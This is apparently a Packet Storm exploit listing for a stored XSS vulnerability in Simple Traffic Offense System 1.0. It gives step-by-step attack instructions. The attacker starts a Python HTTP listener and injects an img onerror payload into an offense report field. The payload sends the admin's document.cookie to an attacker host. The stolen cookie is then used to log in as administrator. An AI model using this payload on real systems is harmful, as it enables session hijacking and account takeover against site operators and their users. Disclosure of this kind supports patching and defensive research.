exploit the possibilities

Simple Traffic Offense System 1.0 Cross Site Scripting

Simple Traffic Offense System 1.0 Cross Site Scripting
Posted Apr 5, 2021
Authored by Richard Jones

Simple Traffic Offense System version 1.0 suffers from a persistent cross site scripting vulnerability.

tags | exploit, xss
MD5 | c0765890ba077d7218f2533e8198df78

Simple Traffic Offense System 1.0 Cross Site Scripting

Change Mirror Download
# Exploit Title: Traffic Offense System | Stored Cross Site Scripting (Cookie-theft)
# Exploit Author: Richard Jones
# Date: 03-04-2021
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/12330/simple-traffic-offense-system-php.html
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34


Stored XSS by adding a offense report.

Steps
1. Using an officer account, login to the application.
2. Start a python server (python3 -m http.server 8090)
3. Goto Report Offense, make a report, add payload below in the name or address field

Payload:

"><img src=x onerror="this.src='http://YOUR-IP:8090/?'+document.cookie; this.removeAttribute('onerror');">

4. Wait for the admin to login.
5. Cookies will show in the python server
6. Get admin access here: http://TARGET/trafic/index.php , open dev tools (f12), add cookie to session and refresh page to be logged in as admin.
Login or Register to add favorites

File Archive:

April 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    17 Files
  • 2
    Apr 2nd
    2 Files
  • 3
    Apr 3rd
    2 Files
  • 4
    Apr 4th
    0 Files
  • 5
    Apr 5th
    15 Files
  • 6
    Apr 6th
    15 Files
  • 7
    Apr 7th
    20 Files
  • 8
    Apr 8th
    16 Files
  • 9
    Apr 9th
    5 Files
  • 10
    Apr 10th
    0 Files
  • 11
    Apr 11th
    0 Files
  • 12
    Apr 12th
    4 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    0 Files
  • 16
    Apr 16th
    0 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close